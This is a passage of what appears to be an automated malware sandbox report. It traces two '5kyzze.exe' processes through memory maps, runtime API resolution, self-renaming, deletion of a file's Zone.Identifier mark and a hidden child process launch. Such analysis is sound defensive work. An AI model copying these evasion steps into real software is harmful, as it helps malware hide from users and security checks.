| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Time | type = Ticks, time = 187747 |
|
1 | |
| Get Time | type = Ticks, time = 188808 |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Release | - |
|
1 |
Process #11: 5kyzze.exe
28
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8bc |
| Parent PID | 0x734 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00242fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025dfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0060ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001f10000 | 0x01f10000 | 0x01f4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001f50000 | 0x01f50000 | 0x02342fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02350000 | 0x0261efff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
Module (27)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #12: 5kyzze.exe
50
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:27, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8f0 |
| Parent PID | 0x8bc (c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8E4
0x
8D0
0x
868
0x
86C
0x
7BC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002c2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032dfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00361fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| windowsshell.manifest | 0x003f0000 | 0x003f0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x02082fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02090000 | 0x0235efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002360000 | 0x02360000 | 0x0245ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002460000 | 0x02460000 | 0x0249ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x025dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x026dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x0280ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000026e0000 | 0x026e0000 | 0x027befff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000027c0000 | 0x027c0000 | 0x027c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000027d0000 | 0x027d0000 | 0x0280ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002810000 | 0x02810000 | 0x02810fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.1.db | 0x02820000 | 0x02823fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x02820000 | 0x02823fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02830000 | 0x0284ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002850000 | 0x02850000 | 0x02850fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02860000 | 0x0288ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x02890000 | 0x02893fff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x028a0000 | 0x02905fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002910000 | 0x02910000 | 0x02910fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x0294ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x02a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| comctl32.dll | 0x73e60000 | 0x73ffdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x742a0000 | 0x74394fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x744c0000 | 0x7453ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74760000 | 0x74775fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74780000 | 0x747a0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747b0000 | 0x747c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747d0000 | 0x747dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747e0000 | 0x747eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x75700000 | 0x75744fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x767a0000 | 0x76822fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\ | type = file_attributes |
|
1 | |
| Move | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe | source_filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe:Zone.Identifier | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe | os_pid = 0xa50, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
Module (28)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
